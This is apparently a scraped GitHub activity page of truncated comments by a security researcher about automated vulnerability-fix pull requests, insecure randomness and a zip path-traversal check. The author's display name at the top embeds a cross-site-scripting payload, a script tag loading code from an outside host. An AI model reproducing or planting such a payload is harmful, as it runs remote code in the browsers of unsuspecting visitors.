Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>

@chtompki Because many people don't read the documentation. Especially on the top of classes. I've found this class of vulnerability in other places because of similar issues around not reading...

Any thoughts on my proposal here around moving the use of insecure randomness to be a more explicit decision as I detailed above: https://github.com/apache/commons-lang/pull/459#issuecomment-532330032 I've got two more public more...

> This PR needs a test that fails without the main change, otherwise it's just one commit away from a regression. I agree! The code generator used to generate this...

> Uh? You created the PR... I used a bot to create the PR on my behalf, as well as generate the fix, as well as generated fixes for 30...

> I am not sure if your tool is a fuzzer, or a static or runtime analyzer that tries to use existing exploits against code bases. OpenRewrite is a Format...

> I am sure you are well-intentioned but the path you chose (arg, pun) is not the best one for the community, I do appreciate the pun 😂 > please...

> Otherwise, even though I believe fixing these issues is beneficial to users, in the end your pull requests may end up stalled for a long time until a volunteer...

I believe so. I think line 58 will always be true. The logic that I'm using to detect this vulnerability looks for the `File.separator` to be appended, but if it...

Looking at this manually, I don't think this vulnerability is present. It's adequately guarded against by this check here: https://github.com/srikanth-lingala/zip4j/blob/9c7bb74ced690387d80882d896faf5640b530196/src/main/java/net/lingala/zip4j/util/FileUtils.java#L215-L217 However, that check will always be true on linux-type systems...

Makes sense. Don't know if it's valuable printing what object where the field has been moving. I've personally found it to be very helpful when debugging.